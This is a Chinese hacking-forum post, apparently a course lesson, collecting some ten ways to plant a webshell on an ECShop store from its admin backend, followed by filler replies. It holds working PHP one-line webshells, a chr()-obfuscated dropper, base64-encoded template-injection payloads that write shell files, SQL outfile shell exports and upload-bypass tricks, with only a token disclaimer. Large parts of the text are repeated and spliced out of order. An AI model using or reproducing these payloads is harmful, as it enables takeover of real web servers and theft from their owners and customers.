HACK80

我们很年轻,但我们有信念、有梦想!

我们坚信只有今天付出了,才有机会看到明天的太阳!
现在!加入我们,给你一个气氛优秀的技术圈子

作者: admin
查看: 6287|回复: 20

主题标签Tag

more +随机图赏Gallery

2017年中旬WEB渗透系列课程-27HASH提权2017年中旬WEB渗透系列课程-27HASH提权
2017年中旬WEB渗透系列课程-01HTTP协议2017年中旬WEB渗透系列课程-01HTTP协议
福利来了:cc攻击器+IP代理工具福利来了:cc攻击器+IP代理工具
2017年中旬WEB渗透系列课程-00前言2017年中旬WEB渗透系列课程-00前言
2017年中旬WEB渗透系列课程-19文件包含与目录遍历2017年中旬WEB渗透系列课程-19文件包含与目录遍历
2017年中旬WEB渗透系列课程-18上传绕过方法演示2017年中旬WEB渗透系列课程-18上传绕过方法演示
2017年中旬WEB渗透系列课程-17了解上传检测方式2017年中旬WEB渗透系列课程-17了解上传检测方式
HACK80远控 免杀的 账号密码打包 每天都发账号 回帖要。可改密码!HACK80远控 免杀的 账号密码打包 每天都发账号 回帖要。可改密码!
2017年中旬WEB渗透系列课程-16解析漏洞演示2017年中旬WEB渗透系列课程-16解析漏洞演示
2017年中旬WEB渗透系列课程-15XSS绕过集合2017年中旬WEB渗透系列课程-15XSS绕过集合

二期公开课第25节-CMS漏洞利用(ecshop)

[复制链接]
admin 发表于 2016-6-25 12:26:37 | 显示全部楼层 |阅读模式
查看: 6287|回复: 20

马上注册,加入HACK80!与我们一起交流。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
333.png
222.png


课程下载:

文字描述:


方法一、
进后台-订单管理-订单打印-选择插入/编辑图片,然后弹出一个对话框,选择链接菜单-浏览服务器,
左上角上传类型选择 media,然后就可以直接上传 php 小马。文件路径是:
/images/upload/Media/xx.php
方法二、
后台-订单管理-订单打印-选择源代码编辑-在最后面插入代码-保存-返回订单列表,随意选择一个订
单打印,返回 OK,生成一句话成功-在根目录生成了一个 null.php,一句话密码:usb
代码:
<?php
$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr
(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).ch
r(97).chr(108).chr(40).chr
(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).c
hr(93).chr(41).chr(59).chr
(63).chr(62); $a=chr(119); $fp=@fopen($filen,$a); $msg=@fwrite($fp,$filec);
if($msg) echo chr(79).chr
(75).chr(33); @fclose($fp); ?>

方法三、
 进后台
 选择模版管理 - 语言项编辑
 搜索“用户信息” 在用户信息后面加上:
${${fputs(fopen(base64_decode(cGNzbGkucGhw),w),base64_decode(PD9w
aHAgZXZhbCgkX1BPU1RbcGNzbGldKT8+))}}  然后确认修改, 访问根目录下 user.php。在同目录下生成 pcsli.php 一句话密码为:pcsli
方法四、
系统==>数据库管理==>sql 查询(可爆出物理路径):
==============创建表失败,导不出 shell======================
show databases;
use 数据库名;
create a(cmd text not null);
insert into a(cmd) values(‘<?php eval($_POST[cmd]);?>’);
select cmd from a into outfile ‘导出路径’;
drop table if exists a; ==================创建表失败,导不出 shell===================
方法五、
前台留个言,内容是我们的一句话木马:<?php eval($_POST[cmd]);?>
IversOn5 整理

接着在后台系统==>数据库管理==>数据备份==>选择自定义备份,选择 ecs_feedback 这张表(存放
留言的表)
备份文件名:x.php;.sql (x.php.sql 形式出错,菜刀链接不成功)
然后菜刀链接成功
http://www.webshell.cc/data/sqldata/x.php;.sql
方法六、
1、添加会员,会员名称插入插入一句话 :<?php eval($_POST[cmd]);?> ,其他随便填写。
2、系统==>数据库管理==>数据备份—自定义备份—选“XXX_users” (其中 XXX 因各站而异,是数据前缀)
3、备份文件名为 mm.php;.sql
4、一句话客户端连接 mm.php;.sql,地址一般为 http://www.xxx.com/data/sqldata/mm.php;.sql
方法七、
模板管理==>库项目管理==>选择 myship.lbi 配送方式。
在文件内容最后面加入一句话代码:<?php eval($_POST[cmd]);?>
菜刀链接 http://www.xxx.com/myship.php 成功。
说明:有些服务器过滤了 eval 导致失败。
方法八、
http://www.xxx.com/includes/fckeditor/editor/filemanager/connectors/test.html
代码省略
对 Media 没有任何限制. 直接 Type=Media 上传 你的 解密 webshell
访问路径为
http://www.xxx.com/images/upload/Media/xxx.php
IversOn5 整理

方法九、
上传 txt 并且没有过滤任何函数. 于是运用到了 php 的文件操作…
<script language=”php”>$file =
file_get_contents(“C:/Inetpub/wwwroot/ecshop/data/Article/1286344719152816497.txt”);
if($file){
$file = “C:/Inetpub/wwwroot/ecshop/data/Article/1286344719152816497.txt”;
$newfile = ‘C:/Inetpub/wwwroot/ecshop/data/distant.php;a.txt’;
copy($file,$newfile);
}</script>
将以上代码插入库项目管理中的 myship.ini
打开 http://www.xxx.com/myship.php
即在 http://www.xxx.com/data/目录下生成 distant.php;a.txt
菜刀连接之…搞定.. 方法十、
进入后台-系统设置-Flash 播放器管理- 直接上传 x.php
ecshop V2.7.2 版本已经没有这个选项 ,所以这个已经失效。
本站内容均为原创,转载请务必保留署名与链接!
ecshop 后台拿 shell 个人总结七种方法:http://www.webshell.cc/1625.html
入后台后,在 menu 里的 模板管理>库项目管理 , 然后选择 myship.lbi,直接写入一句
话,地址 xxx.com/myship.php 大刀连接,上传大马….接下来…好了不说了 ,提权..你懂
得!
不过如上上述方法失败了,那就是版本更新了,其他的老办法(flash 任意上传,slq 导出
等等)也都不好使了,用这个高大上的方法把,后台-邮件模版-编辑,把内容修改成
{$user_name’];file_put_contents(base64_decode(‘Li4vdGVtcC9zaGVsbC5waHA=’),
base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz4=’));echo
$var[‘$user_name}
</p>
<p>{$user_name}您好!<br />
<br />
您已经进行了密码重置的操作,请点击以下链接(或者复制到您的浏览器):<br />
<br />
<a target=”_blank” href=”{$reset_email}”>{$reset_email}</a><br />
<br />
以确认您的新密码重置操作!<br />
<br />
{$shop_name}<br />
{$send_date}</p>
点击确定,在后台登陆地方点忘记密码,输入用户和邮箱 (这个在后台随便找个用户就
OK)提交就会在 temp 下生成 shell.php 一句话木马,密码是 207
IversOn5 整理

Li4vdGVtcC9zaGVsbC5waHA= 用 base64 解密就是 ../temp/shell.php
鸣谢:
感谢那些用自己的时间来写帖子的大牛们!我只是收集过来,整理而已。
Tips:还请大家能够怀着感谢的心来使用这些方法!
注:请勿使用本文所说的方法来攻击破坏他人计算机系统,如若出现非法行为,与本人无关!

}</script>
将以上代码插入库项目管理中的 myship.ini
打开 http://www.xxx.com/myship.php
即在 http://www.xxx.com/data/目录下生成 distant.php;a.txt
菜刀连接之…搞定.. 方法十、
进入后台-系统设置-Flash 播放器管理- 直接上传 x.php
ecshop V2.7.2 版本已经没有这个选项 ,所以这个已经失效。
本站内容均为原创,转载请务必保留署名与链接!
ecshop 后台拿 shell 个人总结七种方法:http://www.webshell.cc/1625.html
入后台后,在 menu 里的 模板管理>库项目管理 , 然后选择 myship.lbi,直接写入一句
话,地址 xxx.com/myship.php 大刀连接,上传大马….接下来…好了不说了 ,提权..你懂
得!
IversOn5 整理
from 5 号黯区
Blog:http://iverson5.blog.163.com
不过如上上述方法失败了,那就是版本更新了,其他的老办法(flash 任意上传,slq 导出
等等)也都不好使了,用这个高大上的方法把,后台-邮件模版-编辑,把内容修改成
{$user_name’];file_put_contents(base64_decode(‘Li4vdGVtcC9zaGVsbC5waHA=’),
base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz4=’));echo
$var[‘$user_name}
</p>
<p>{$user_name}您好!<br />
<br />
您已经进行了密码重置的操作,请点击以下链接(或者复制到您的浏览器):<br />
<br />
<a target=”_blank” href=”{$reset_email}”>{$reset_email}</a><br />
<br />
以确认您的新密码重置操作!<br />
<br />
{$shop_name}<br />
{$send_date}</p>
点击确定,在后台登陆地方点忘记密码,输入用户和邮箱 (这个在后台随便找个用户就
OK)提交就会在 temp 下生成 shell.php 一句话木马,密码是 207Blog:http://iverson5.blog.163.com
Li4vdGVtcC9zaGVsbC5waHA= 用 base64 解密就是 ../temp/shell.php
鸣谢:
感谢那些用自己的时间来写帖子的大牛们!我只是收集过来,整理而已。
Tips:还请大家能够怀着感谢的心来使用这些方法!
注:请勿使用本文所说的方法来攻击破坏他人计算机系统,如若出现非法行为,与本人无关!



忆寒 发表于 2016-6-25 16:05:39 | 显示全部楼层
楼主,替我问候您主治大夫!
rojadoo 发表于 2016-6-25 12:26:38 | 显示全部楼层
看帖回帖是美德!
songtao10 发表于 2016-6-25 12:27:19 | 显示全部楼层
看在楼主的面子上,认真回帖!
MiracleEgo 发表于 2016-6-25 12:53:41 | 显示全部楼层
楼上是GG还是MM啊?
求虐002 发表于 2016-6-25 12:55:46 | 显示全部楼层
楼上的能详细介绍一下么?
戴花 发表于 2016-6-25 13:26:39 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
戴花 发表于 2016-6-25 14:26:42 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
a985352332 发表于 2016-6-25 14:30:43 | 显示全部楼层
不是已经发过了?
coverme 发表于 2016-6-25 15:30:20 | 显示全部楼层
好东西,赞一个!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|小黑屋|手机版|HACK80 ( 沪ICP备15007512号 )

GMT+8, 2017-12-18 01:45 , Processed in 0.068857 second(s), 32 queries .

Powered by Discuz! X3.4 © 2001-2013 Comsenz Inc.